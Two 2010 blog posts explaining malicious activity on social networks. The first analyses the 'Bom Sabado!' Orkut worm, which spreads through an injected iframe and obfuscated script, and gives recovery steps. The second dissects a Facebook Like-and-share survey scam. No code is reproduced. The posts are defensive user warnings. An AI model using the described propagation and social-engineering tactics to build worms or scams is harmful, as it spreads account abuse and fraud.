Saturday, September 25, 2010

Bom Sabado! Orkut Worm!!

Blog moved. I have a new home now at Do update your bookmarks :)
Today I have been getting many scraps from friends (in Orkut!!!) with just the text "Bom Sabado!". Google translator tells me that it means "Good Saturday!", well seems like its going to be not so good Saturday for many!!.As time passes by more and more people seems to sends this scraps, indicating clearly that this is  some kind of a worm.
So I thought of digging into it a bit deeper, I created a dummy account so that my normal account will not be affected.Then added myself as friend in the dummy account, so that I can monitor it.Then I opened the scrap I got from the dummy account.While inspecting the source code, I found that the suspicion is true, it in needs is the work of a worm!!.I found following iframe  code injected along with the message into scrap.
This injected iframe loads "worm.js"  script from tptoolsorg which apparently causes all the problems.

Downloading the worm.js from the source and decoding it gives me following observations.
  1.  It uses standard JS Objects and XMLHttpRequest to all sorts trouble.
  2.  Code is obfuscated by using octal representation for objects and weird names  (eg: _0x7c2bx4) for variables. 
  3. It does the following if you opens a scrap page.  
  • Makes you join 5 communities.
  • Sends Scraps to all your friends.

Following shows the part of the code that is responsible for the problems.

The main sign of infection is that, your browser will be hanged for a while if you open such a page.if you find it happens to you, close the browser immediately. It will prevent the worm from spreading.

Recovery Methods
  1. Clean all the cookies and private data stored in the browser. 
  2. Install Firefox and NoScript addon, it will block all the scripts. Allow only those you wanted. But be careful not to allow scripts from tptoolsorg.
  3. Remove all those "Bom Sabado!" scraps from your Scrapbook.
  4. Be careful not to visit any of the infected pages until Google fix this injection vulnerability.

Thursday, September 9, 2010


Blog moved. I have a new home now at Do update your bookmarks :)
If you are a regular user of FB, there is a high chance that you must have seen something like this in your Newsfeed.
 The title will create such a curiosity in one's mind that, you will be forced to click on it. On clicking the link, you will be taken into a website with a "Like" button and with with texts asking you to click on the like button to proceed.
If you click on the Like button, it will be added to your likes and interests [ As per FB documentation, a page you Like will have capability to publish content to your News Feed whenever it pleases to, till you manually remove it ] Once you Liked the page, it will again ask you to share it with your friends as Step2 to view the "Amazing Content".

If you click the Share button, a popup window will come up asking you to Share the content with your friends.If you try to Skip it, an alert window will come saying unless you share this, you won't be able to see the content.
Driven by curiosity and unaware of the consequences, many people will actually share it!!, leading to further propagation of the scam. The result of all these so called "Steps" is that you will be presented with page asking you to perform "Human Verification" by completing a survey!!.Each time someone does a survey, the Scammer get money!! and free publicity, what an amazing marketing strategy!!.
How it is done?

By checking the source code of the page, it can be seen that Scammers are exploiting FB's own social plugin APIs!!.
They have added few Javascript of their own to detect using pressing 'Like' button, also to create an alert if the person refuses to Publish it to friends .

In this particular case, FB's own APIs are being used, and no password stealing code/malware download code has been found.But since 'liked' page has the capability to push content into the user, its very much possible to do worm/Trojan spreading using similar tactics.
Digging deep into the code, the final destination to which user will taken after Liking and Publishing is found.
If you visit this page directly, you will be treated with a page asking to complete the survey.If you act fast enough to hit the 'Escape' key as soon the page is getting loaded to stop the advertisement from getting loaded, you will be able to see the "Actual Amazing Content".

This just one of the hundreds if not thousands SCAMS that being propagated over FB, most of them uses the same tactics.If you have already fallen for one, go to Likes and Interests in your profile and remove the particular page.If you haven't , be careful not be a victim.Happy Facebooking!! :)